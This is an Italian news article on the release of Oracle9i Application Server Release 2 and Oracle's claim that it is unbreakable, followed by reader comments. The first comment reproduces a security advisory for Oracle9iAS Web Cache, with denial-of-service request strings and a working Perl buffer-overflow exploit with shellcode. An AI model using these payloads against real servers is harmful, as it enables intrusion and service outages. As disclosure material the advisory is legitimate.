Oracle: il nuovo 9i AS è a prova di proiettile

Oracle punta con decisione al giovane mercato degli application server e, mirando alla vetta, definisce la nuova versione di Oracle9i AS invulnerabile

San Francisco (USA) - Ad un solo anno di distanza dal rilascio del primo Oracle9i Application Server, il colosso guidato da Larry Ellison ha già guadagnato, nel mercato degli application server, un ruolo di primo piano dietro a BEA e IBM.

Con il rilascio del nuovo Oracle9i Application Server Release 2 (ASR2), l'azienda sembra ora puntare decisa verso la vetta, focalizzandosi così su di un business che, a fianco di quelli tradizionali legati ai database aziendali ed ai sistemi per l'e-business, riveste ormai una posizione centrale nelle politiche di Oracle.

Oracle9i ASR2 introduce diverse novità legate alle comunicazioni wireless e vocali, fra cui un miglior accesso ad Internet attraverso la voce, messaggistica e sistemi di sicurezza wireless, mobile e-mail, servizi personalizzabili in base alla locazione, e supporto alle reti mobili 2.5G e 3G.
Il nuovo application server di Oracle supporta Java 2 Enterprise Edition 1.3 (J2EE), una piattaforma che, secondo John Magee, direttore al marketing di Oracle, "gode di un'adozione tre volte superiore a quella di Microsoft.NET", aggiungendo poi che nessun altro concorrente può vantare un supporto a Java più completo. Oracle9i ASR2 supporta poi i principali standard aperti del Web, fra cui SOAP, UDDI e WSDL.

Oracle sbandiera l'affidabilità e la sicurezza della sua soluzione, due caratteristiche che renderebbero Oracle9i ASR2 "indistruttibile e inviolabile". Buona parte di questa forza - sostiene l'azienda - deriva dall'architettura a clustering della piattaforma server e dal sistema di sicurezza "single sign-on" per la protezione dei siti Web, dei portali, delle applicazioni wireless e dei Web service.
TAG: sw
6 Commenti alla Notizia Oracle: il nuovo 9i AS è a prova di proiettile
Ordina
  • Oracle9iAS Web Cache Multiple DoS and Buffer Overflow


    Vulnerable systems:
    Oracle9iAS Web Cache version 2.0.0.1.0

    A simple URL driven denial of service or buffer overflow condition occurs when a very long text string is sent to the web service. This occurs on all four web services that the Oracle9iAS Web Cache software provides. The four services are by default run on:
    Port 1100 = Incoming web cache proxy.
    Port 4000 = Administrative interface.
    Port 4001 = Web XML invalidation port.
    Port 4002 = Statistics port.

    Buffer overflow condition:
    When sending a request containing / + 'A' x 3095 + 'N' x 4, the process terminates with the with the following state dump:

    <....snip>
    State Dump for Thread Id 0x104

    eax=00000c1d ebx=00000000 ecx=00000c1d edx=026f0041
    esi=01baac86 edi=0040deb6
    eip=4e4e4e4e esp=0632fe08 ebp=41414141 iopl=0
    cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
    efl=00000216
    <snip....>

    Denial of service:
    Upon sending a string longer then 3570 characters, the process simply exists without stack dump:
    'GET /<3571 x A> HTTP/1.0'

    The following three denial of service attacks result in the process hanging and the CPU usage of 100%. A reboot is required in order to terminate the hanging processes:

    - When sending a string containing approximately 3094 characters.
    - When sending more approximately 4000 characters in the HTTP header. User-Agent is one of the verified headers where this condition exists.
        'GET / HTTP/1.0'
        'User-Agent: <4000 x A>'

    - Sending the following request (this only affects the webcache admin interface):
        'GET /. HTTP/1.0'

    Workaround:
    Download patch from Oracle's support website,
    http://metalink.oracle.com

    Windows NT or Windows 2000:
    Patch number 2044682

    SUN Sparc Solaris:
    Patch number 2042106

    HP-UX:
    Patch number 2043908

    Linux:
    Patch number 2043924

    Compaq Tru64 Unix:
    Patch number 2043921

    IBM AIX:
    Patch number 2043917

    Exploit:
    ####################################################################
    #
    # Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
    # Creates the file c:\defcom.iyd
    # By andreas@defcom.com (C)2001
    #
    #
    # Since we do not control the space after what ESP points to, I was lazy
    # and did a direct buffer jump. So, if it does not work, try changing
    # the return address(start of buffer in mem) to one that fits your system.
    # The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
    # /andreas
    #
    ####################################################################
    $ARGC=@ARGV;
    if ($ARGC !=1) {
        print "Usage: $0 <host>\n";
        print "Example: $0 127.0.0.1\n";
        exit;
    }
    use Socket;

    my($remote,$port,$iaddr,$paddr,$proto);
    $remote=$ARGV[0];
    $port = "1100"; # default port for the web cache

    $iaddr = inet_aton($remote) or die "Error: $!";
    $paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
    $proto = getprotobyname('tcp') or die "Error: $!";

    socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
    connect(SOCK, $paddr) or die "Error: $!";

    $sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
    $sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
    $sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
    $sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
    $sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
    $msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
    print $msg;
    send(SOCK, $msg, 0) or die "Cannot send query: $!";
    sleep(1);
    close(SOCK);
    exit;


    e come vedete c'è anche l'esploite complimenti oracle raggiungi e superi la MS

    ricordate non esiste la sicurezza non fatevi fregare
    non+autenticato
  • devono solo spararmi per costringermi ad usarla e cosi comodo tomcaz ed e gratisso
    non+autenticato
  • scusa, cos'è tomcaz gratisse?
    non+autenticato
  • ma vorrei sapere chi con un po di inteliggenza nella zucca va ad impelagarsi con una cosa rognosa come un oraculo boooooo, forse chi si può permettere i suoi costosi consulenti che non consolano proprio niente (le fatture le sanno fare pero altro che bill, in confronto a loro e una verginella)
    non+autenticato
  • Non so voi ma sarà la quarta volta che cerco di installare l'AS di Oracle ...
    Una volta per bontà sua
    Una volta perchè va in conflitto con la mia attuale versione client
    Una volta perchè ho cambiato le directory predefinite
    Una volta per ....


    Voi tutto ok ?
    non+autenticato
  • "indistruttibile e inviolabile"

    Fare di queste affermazioni vuol dire cercarsele, le rogne.
    non+autenticato